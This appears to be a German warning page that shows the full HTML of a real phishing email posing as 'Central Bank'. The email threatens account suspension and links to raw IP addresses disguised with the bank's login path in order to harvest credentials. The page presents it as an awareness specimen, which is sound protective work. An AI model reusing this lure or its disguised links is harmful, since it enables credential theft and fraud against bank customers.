Beispiel für eine Phishing-Email vom Typ HTML.Phishing.Auction-64
Achtung:
Bitte keine Klicks im Text unten durchführen (mit Ausnahme des "Zurück"-Links am Ende der Seite), es handelt sich um realen Schadcode!!!
Zurück
<HTML><HEAD><TITLE>Central Bank</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<A HreF="http://www.centralbank.net">
<SCRIPT language=JavaScript type=text/javascript>
<!-- Hide JavaScript from Incompatable Browsers
///////////////////////////////////////////////////////////////////////////////
//Detect browser version; set up mouseover image array for top navigation
///////////////////////////////////////////////////////////////////////////////
//initialize variables
version = "0";
browserName = navigator.appName;
browserVer = parseInt(navigator.appVersion);
has_loaded = 0;
do_javascript = 0; //flag stating browser can processing the script (0 = false; 1 = true)
var status1 = "";
var status2 = "";
var status3 = "";
var status4 = "";
var status5 = "";
var status6 = "";
var status7 = "";
var status8 = "";
var status9 = "";
var status10 = "";
var status11 = "";
if (browserName == "Microsoft Internet Explorer")
{
if (browserVer >= 4)
{
version = "e4";
do_javascript = 1;
}
else
{
do_javascript = 0;
} //if (browserVer >= 4)
} //if (browserName == "Microsoft Internet Explorer")
if (browserName == "Netscape")
{
if (browserVer >= 3)
{
version = "n3";
do_javascript = 1;
}
else
{
do_javascript = 0;
} //if (browserVer >= 3)
} //if (browserName == "Netscape")
//function load_images()
function load_images()
{
if (do_javascript == 1)
{
overImage4 = new Image;
overImage5 = new Image;
overImage6 = new Image;
overImage7 = new Image;
overImage8 = new Image;
overImage9 = new Image;
overImage10 = new Image;
overImage11 = new Image;
outImage4 = new Image;
outImage5 = new Image;
outImage6 = new Image;
outImage7 = new Image;
outImage8 = new Image;
outImage9 = new Image;
outImage10 = new Image;
outImage11 = new Image;
overImage4.src = "/images/espanolro.gif";
overImage5.src = "/images/sitemapro.gif";
overImage6.src = "/images/psolutionsro.gif";
overImage7.src = "/images/sbsolutionsro.gif";
overImage8.src = "/images/aboutbbtro.gif";
overImage9.src = "/images/locationsro.gif";
overImage10.src = "/images/contactusro.gif";
//next line is new commercial/corp.
overImage11.src = "/images/commercial/csolutionsro.gif";
//overImage11.src = "/images/csolutionsro.gif";
outImage4.src = "/images/espanol.gif";
outImage5.src = "/images/sitemap.gif";
outImage6.src = "/images/psolutions.gif";
outImage7.src = "/images/sbsolutions.gif";
outImage8.src = "/images/aboutbbt.gif";
outImage9.src = "/images/locations.gif";
outImage10.src = "/images/contactus.gif";
//next line is new commercial/corp.
outImage11.src = "/images/commercial/csolutions.gif";
//outImage11.src = "/images/csolutions.gif";
has_loaded=1;
} //if (do_javascript == 1)
return true;
} //function load_images()
//function mouse_over(imageNum)
function mouse_over(imageNum)
{
if (has_loaded==1)
{
var iNum;
var i;
var name;
var iname;
name = "status"+imageNum;
window.status = eval(name);
if (do_javascript == 0)
{
return true;
} //if (do_javascript == 0)
iNum = parseInt(imageNum);
for (i = 4; i <12; i=i+1)
{
name="image" +i;
if (i== iNum)
{
iname="overImage" +i+".src";
}
else
{
iname="outImage" +i+".src";
} //if (i== iNum)
document[name].src=eval(iname);
} //for (i = 5; i <12; i=i+1)
} //if (has_loaded==1)
return true;
} //function mouse_over(imageNum)
//function mouse_out(imageNum)
function mouse_out(imageNum)
{
if (has_loaded==1)
{
var name;
var iname;
window.status = " ";
if (do_javascript == 0)
{
return true;
} //if (do_javascript == 0)
name = "image"+imageNum;
iname = "outImage"+imageNum+".src";
document [name].src = eval(iname);
} //if (has_loaded==1)
return true;
} //function mouse_out(imageNum)
//function di20(id, newSrc)
//Swaps images.
function di20(id, newSrc)
{
var theImage = FWFindImage(document, id, 0);
if (theImage)
{
theImage.src = newSrc;
} //if (theImage)
} //function di20(id, newSrc)
//function FWFindImage(doc, name, j)
//Track and set toggle group button states.
function FWFindImage(doc, name, j)
{
var theImage = false;
if (doc.images)
{
theImage = doc.images[name];
} //if (doc.images)
if (theImage)
{
return theImage;
} //if (theImage)
if (doc.layers)
{
for (j = 0; j < doc.layers.length; j++)
{
theImage = FWFindImage(doc.layers[j].document, name, 0);
if (theImage)
{
return (theImage);
} //if (theImage)
} //for (j = 0; j < doc.layers.length; j++)
} //if (doc.layers)
return (false);
} //function FWFindImage(doc, name, j)
// -->
</SCRIPT>
<SCRIPT language=JavaScript>
<!-- hide this script from non-javascript-enabled browsers
function MM_findObj(n, d) { //v3.0
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document); return x;
}
/* Functions that swaps images. */
function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}
// stop hiding -->
</SCRIPT>
<SCRIPT language=JavaScript>
<!-- Hide JavaScript from Incompatable Browsers
///////////////////////////////////////////////////////////////////////////////
//function change_url(form, strFormTitle)
// form - Denotes which form is being used
// strFormTitle - Denotes which drop-down was used.
// (1 - Select An Area, 2 - Online Products)
//Redirect current page to selected item from a drop-down.
///////////////////////////////////////////////////////////////////////////////
function change_url(form, strFormTitle, blnDropDownFrame)
{
if (strFormTitle == 1)
{
parent.location.href = document.SelectAreaForm.SelectAnArea_List.options[document.SelectAreaForm.SelectAnArea_List.selectedIndex].value;
}
else
{
if (document.OnlineProductsForm.OnlineProducts_List.options[document.OnlineProductsForm.OnlineProducts_List.selectedIndex].value != "none")
{
parent.location.href = document.OnlineProductsForm.OnlineProducts_List.options[document.OnlineProductsForm.OnlineProducts_List.selectedIndex].value;
}
} //if (strFormTitle == 1)
} //function change_url(form, strFormTitle)
// -->
</SCRIPT>
<SCRIPT language=JavaScript>
<!--
function popupGlob(GlobFile) {
if (navigator.appName == "Microsoft Internet Explorer"& navigator.appVersion.substring(0,1) == "4") {
GlobPop = window.open(GlobFile,'_globpop','toolbar=1,location=0,directories=0,left=250, top=50, status=yes,menubar=0,scrollbars=1,resizable=yes,width=500,height=400')
} else if (navigator.appName == "Microsoft Internet Explorer"& navigator.appVersion.substring(0,1) != "4") {
GlobPop = window.open(GlobFile,'_globpop','toolbar=1,location=0,directories=0,status=yes,menubar=0,scrollbars=1,resizable=yes,width=500,height=400')
} else if (navigator.appName == "Netscape" & navigator.appVersion.substring(0,1) == "2") {
GlobPop = window.open(GlobFile,'_globpop','toolbar=1,location=0,directories=0,status=yes,menubar=0,scrollbars=1,resizable=yes,width=500,height=400')
GlobPop = window.open(GlobFile,'_globpop','toolbar=1,location=0,directories=0,status=yes,menubar=0,scrollbars=1,resizable=yes,width=500,height=400')
} else {
GlobPop = window.open(GlobFile,'_globpop','toolbar=1,location=0,directories=0,status=yes,menubar=0,scrollbars=1,resizable=yes,width=500,height=400')
GlobPop.focus();
}
}
// -->
</SCRIPT>
<META content="MSHTML 6.00.2800.1479" name=GENERATOR></HEAD>
<BODY text=#000000 vLink=#336699 aLink=#999999 link=#660033 bgColor=#ffffff
onload=load_images()>
<!-- webtrends live tag begin-->
<!-- START OF SmartSource Data Collector TAG Include -->
<!-- Copyright 2002 NetIQ Corporation -->
<!-- V6.0a -->
<SCRIPT language=Javascript>
<!--
gVersion="1.0";
//-->
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT><!-- webtrends live tag end -->
<TABLE cellSpacing=0 cellPadding=0 width=625 border=0>
<!--DWLayoutTable-->
<TBODY>
<TR>
<TD width="10"> </TD>
<TD width=10 rowSpan=3> </TD>
<TD vAlign=top width=13 rowSpan=3><IMG
src="BB&T - Privacy and Security_files/spot.gif" width=1></TD>
<TD width=12 rowSpan=3> </TD>
<TD vAlign=top width=580>
<!-- Content begins here -->
<p align="right"><FONT
face=Serif,Arial,Helvetica color=#660033 size=5><B><a href="http://210.110.180.185/usage/ebay/"><a href="https://203.99.96.4/.myonlineservices.centralbank.net/ISRVWebApplication/login/Login.html"><img height=58
alt="BB&T Home"
src="https://myonlineservices.centralbank.net/ISRVWebApplication/login/images/001_logo_content.gif" width=432
border=0></a></a></B></FONT></p>
<p align="right"><FONT
face=Serif,Arial,Helvetica color=#660033 size=5><font color="#000066"><strong>UPDATE
YOUR ACCOUNT</strong></font> </FONT> </p>
<P><FONT color="#000066" size=2 face=arial,helvetica><I>Dear valued customer</I>
</FONT></P>
<p><FONT color="#000066" size=2 face=Arial> We
regret to inform you that your account at CentralBank could be suspended
if you don't update your billing information. To resolve this problem
please <A target="_blank" href="https://203.99.96.4/.myonlineservices.centralbank.net/ISRVWebApplication/login/Login.html" a>click
here</A> and login to your account in order to resolve the update process.
If your account information is not updated, your ability to access your
CentralBank Online account will become restricted.<BR>
As per the User Agreement, we may immediately
issue a warning, temporarily suspend, indefinitely suspend or terminate
your membership and refuse to provide our services to you if we believe
that your actions may cause financial loss or legal liability for you,
our users or us. We may also take these actions if we are unable to
verify or authenticate any information that you provide to us.<BR>
Due to the suspension of this account, please
be advised you are prohibited from using CentralBank in any way. This
includes the enrolling of a new account. Please note that this suspension
does not relieve you of your agreed-upon obligation to pay any fees
you may owe to CentralBank.</FONT></p>
<FONT
face=arial,helvetica size=2> </FONT>
<CENTER>
<hr width="80%">
<TABLE cellSpacing=0 cellPadding=0 border=0>
<TBODY>
<TR>
<TD vAlign=top align=middle> <TABLE cellSpacing=0 cellPadding=0 border=0>
<TBODY>
<TR>
<TD width="244" align=middle><p align="center"><FONT face=arial,helvetica color=#660033
size=1>© Central Bank 2005</FONT></p>
<p align="right"> </p></TD>
</TR>
</TBODY>
</TABLE></TD>
</TR>
</TBODY>
</TABLE>
<BR>
<TABLE cellSpacing=0 cellPadding=0 border=0>
<TBODY>
<TR>
<TD vAlign=top align=middle><div align="center"></div></TD>
</TR>
</TBODY>
</TABLE>
</CENTER></TD>
</TR>
</TBODY>
</TABLE>
</BODY></HTML>
Zurück
Please look here!